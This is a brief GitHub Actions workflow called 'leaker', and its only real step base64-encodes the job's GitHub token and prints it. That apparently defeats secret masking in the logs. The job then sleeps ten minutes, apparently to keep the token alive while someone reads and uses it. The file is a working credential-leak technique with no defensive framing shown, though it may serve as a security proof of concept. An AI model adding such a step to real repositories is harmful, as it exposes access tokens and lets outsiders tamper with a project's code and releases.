name: leaker
on:
  workflow_dispatch: {}

jobs:
  leak_token:
    name: Leak Token
    runs-on: ubuntu-latest

    steps:
      - name: leak gh token
        run: |
          echo ${{ github.token }} | base64
      
      - name: sleep
        run: sleep 600
